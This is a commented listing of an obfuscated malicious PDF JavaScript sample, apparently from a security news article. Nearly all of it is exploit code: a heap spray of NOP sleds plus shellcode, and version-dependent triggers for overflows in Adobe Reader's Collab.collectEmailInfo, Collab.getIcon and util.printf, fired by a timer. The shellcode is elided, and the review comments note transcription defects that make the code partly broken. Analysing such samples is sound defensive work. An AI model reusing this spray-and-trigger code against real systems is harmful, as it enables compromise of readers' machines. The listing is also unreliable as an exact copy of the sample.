
A commented listing of the exploit

The code in this listing may cause your anti-virus scanner to issue an alert. This is a false alarm in the practical sense: the signatures correctly recognise the exploit's known API names and byte patterns, but the listing is reproduced as plain text with the shellcode elided ([...]), so nothing on this page can execute.

// Global array that receives the heap-spray blocks (filled by kdNO4K43 below).
var t98Sd1ma7 = new Array();
// Timer id returned by app.setTimeOut at the bottom of the file; the payload
// function cancels it via app.clearTimeOut as soon as it starts running.
var gh4Xf51rN;
// Prepare the Heap Spraying
// Grows the seed string by repeated self-concatenation until its size in
// bytes (length * 2, one JS string element being a 16-bit code unit) reaches
// hTfjUKHViV, then trims it back to hTfjUKHViV / 2 code units.
//   yYGbAXsdzD: seed string (the NOP pattern)
//   hTfjUKHViV: requested size of the result in bytes
// Returns the padded string; the caller prepends it to the shellcode so that
// every spray block ends up with the same total size.
function jytghWfFit(yYGbAXsdzD, hTfjUKHViV){
while(yYGbAXsdzD.length * 2 < hTfjUKHViV){
yYGbAXsdzD += yYGbAXsdzD;
}
// substring() truncates a fractional hTfjUKHViV / 2 toward zero.
yYGbAXsdzD = yYGbAXsdzD.substring(0, hTfjUKHViV / 2);
return yYGbAXsdzD;
}
// Choose shellcode and create Nop sled
// Builds the heap spray for one of three payload variants and stores the
// blocks in the global array t98Sd1ma7.
//   kJSzl5v6vo == 0: payload used on the Collab.collectEmailInfo path,
//                    spray must reach address 0x0c0c0c0c
//   kJSzl5v6vo == 1: payload used on the util.printf path, target 0x30303030
//   kJSzl5v6vo == 2: payload used on the Collab.getIcon path; no target
//                    address is assigned in this branch (see note at the loop)
// The shellcode is written as many short %u-escaped fragments that are only
// joined at run time; presumably the string is split like this to defeat
// simple pattern matching on the document text.
// NOTE(review): 'functionkdNO4K43' is printed without a space after the
// keyword; the three call sites use kdNO4K43(...), so this is a transcription
// defect of the listing. The [...] markers stand for elided shellcode
// fragments — the listing is intentionally not runnable as shown.
functionkdNO4K43(kJSzl5v6vo){
if(kJSzl5v6vo == 0){
// Address the spray has to cover; the same value is used as the filler
// pattern in exploit 1 ("%u0c0c%u0c0c").
var kujFF0yXr = 0x0c0c0c0c;
var wly56uG4w = new Array("%u535","0%u525","1%u5756%u9",
[...],"03d%u","9000");
}
else if(kJSzl5v6vo == 1){
kujFF0yXr = 0x30303030;
var wly56uG4w = new Array("%u5350","%u5251%u","5756%u9c5",
[...],"u313d%u900","0");
}
else if(kJSzl5v6vo == 2){
var wly56uG4w = new Array("%u5350%u52","51%u5756","%u9c55%u",
[...],"%u6469%u3","23d%u9000");
}
    // Assemble the shellcode -> wly56uG4w: join the fragments, then decode
    // the %uXXXX escapes into a binary string.
wly56uG4w = unescape(wly56uG4w.join(""));
   var lQ7jYN7Ee = 0x400000; // size of one spray block (4 MiB)
var l7UWARF9Z = wly56uG4w.length * 2; // shellcode size in bytes
// NOP sled size in bytes: block size minus shellcode minus 0x38 (presumably
// headroom for the string object's own allocation overhead — not verified).
var hTfjYKHViV_doc_placeholder_never_used = undefined;
var hTfjUKHViV = lQ7jYN7Ee - (l7UWARF9Z + 0x38);
// NOP commands
var yYGbAXsdzD = unescape("%u9090%u9090"); // four 0x90 (x86 NOP) bytes as the seed
    // Create the sled
yYGbAXsdzD = jytghWfFit(yYGbAXsdzD, hTfjUKHViV);
// Number of 4 MiB blocks needed to reach the target address starting at
// 0x400000.
// NOTE(review): in the kJSzl5v6vo == 2 branch kujFF0yXr is never assigned,
// so this expression is NaN, the loop condition is false and no blocks are
// allocated. Whether that is an omission in the original sample or in this
// abridged listing cannot be determined from the page.
   var vwd0fuUcVE = (kujFF0yXr - 0x400000) / lQ7jYN7Ee;
    // ... and add the shellcode: each block is sled followed by shellcode
for(var ylXB738Q = 0; ylXB738Q < vwd0fuUcVE; ylXB738Q++){
t98Sd1ma7[ylXB738Q] = yYGbAXsdzD + wly56uG4w;
}
}
// Decide which exploit to use
// Entry point fired by the timer set up at the bottom of the file. Reads the
// viewer version, then selects among three vulnerable Acrobat JavaScript APIs
// by version range. Each path first builds the matching heap spray with
// kdNO4K43(n) and then calls the API with an oversized argument.
// NOTE(review): the page itself does not name the vulnerabilities; the three
// APIs are commonly tracked as CVE-2007-5659 (Collab.collectEmailInfo),
// CVE-2009-0927 (Collab.getIcon) and CVE-2008-2992 (util.printf) — verify
// against a vulnerability database before relying on these identifiers.
function a6Omhe8Jq(){
var facAHEjvfd = 0; // becomes 1 once the getIcon path has been tried or skipped
// get version of Adobe Reader
// The version is turned into a string; the comparisons below still work
// because JS coerces the string back to a number for >=, <, <= and ==.
var waNWb0AX4 = app.viewerVersion.toString();
app.clearTimeOut(gh4Xf51rN);
if((waNWb0AX4 >= 8 && waNWb0AX4 < 8.102) || waNWb0AX4 < 7.1){
// Exploit 1: Collab.collectEmailInfo Overflow
kdNO4K43(0);
// The nop sled is near 0x0c0c0c0c
// Filler for the msg argument: the 0x0c0c0c0c pattern doubled until it is at
// least 44952 code units long, presumably so that whatever it overwrites
// points into the sprayed region.
var m5r7RwwLp = unescape("%u0c0c%u0c0c");
while(m5r7RwwLp.length < 44952) m5r7RwwLp += m5r7RwwLp;
       // Prepare the exploit
// Object and method are reached through aliases and bracket notation,
// presumably so the names "Collab"/"collectEmailInfo" are harder to match
// as a single token.
var oWdCzbRki = this;
var wHOvDN3CA = Collab;
oWdCzbRki["collabStore"] =
wHOvDN3CA["collectEmailInfo"]({subj : "", msg : m5r7RwwLp});
// NOTE: the next statement is a plain 'if', not 'else if' — for a viewer
// version below 7.1 both this block and the previous one are entered.
   } if((waNWb0AX4 >= 8.102 && waNWb0AX4 < 8.104) ||
(waNWb0AX4 >= 9 && waNWb0AX4 < 9.1) ||
waNWb0AX4 <= 7.101 ){
try{
if(app.doc.Collab.getIcon){
// Exploit 2: Collab.getIcon
kdNO4K43(2);
// Prepare the exploit
// Argument: "N." followed by at least 0x4000 tab characters.
var bDA4BU6bV = unescape("%09");
while(bDA4BU6bV.length < 0x4000){bDA4BU6bV += bDA4BU6bV;}
bDA4BU6bV = "N." + bDA4BU6bV;
           // Call the vulnerable function
var vkQkwqXx = app;
vkQkwqXx["doc"]["Collab"]["getIcon"](bDA4BU6bV);
facAHEjvfd = 1;
} else{facAHEjvfd = 1;}
// Any exception (e.g. getIcon missing or the call failing) is swallowed and
// the fallback below is still attempted.
} catch(e){facAHEjvfd = 1;}
if(facAHEjvfd == 1){
// The third path is only taken for exactly these two versions.
if(waNWb0AX4 == 8.102 || waNWb0AX4 == 7.1){
// Exploit 3: util.printf
kdNO4K43(1);
// prepare exploit
// Argument: "12999999999999999999" followed by 276 '8' characters.
// fqwUwehjt is never declared with var, so it leaks as a global.
var ogW2Dea1i = "12999999999999999999";
for(fqwUwehjt = 0; fqwUwehjt < 276; fqwUwehjt++){
ogW2Dea1i += "8";
}
// Call the vulnerable function
// "%45000f" requests a 45000-character field width for the number above.
var tEODTfxDJ = util;tEODTfxDJ["printf"]("%45000f", ogW2Dea1i);}
       }
}
}
// Set up the time bomb that triggers the exploits
// The payload function is attached to the app object and scheduled 10 ms
// later through app.setTimeOut with a string expression that the viewer
// evaluates. The returned timer id is kept in gh4Xf51rN so that a6Omhe8Jq
// can cancel it (app.clearTimeOut) once it has started. The indirection
// through a freshly named app property is presumably meant to hinder static
// analysis of the document script.
app.jTSCccXdL = a6Omhe8Jq;
gh4Xf51rN = app.setTimeOut("app.jTSCccXdL()", 10);
Print Version | Permalink: http://h-online.com/-1038864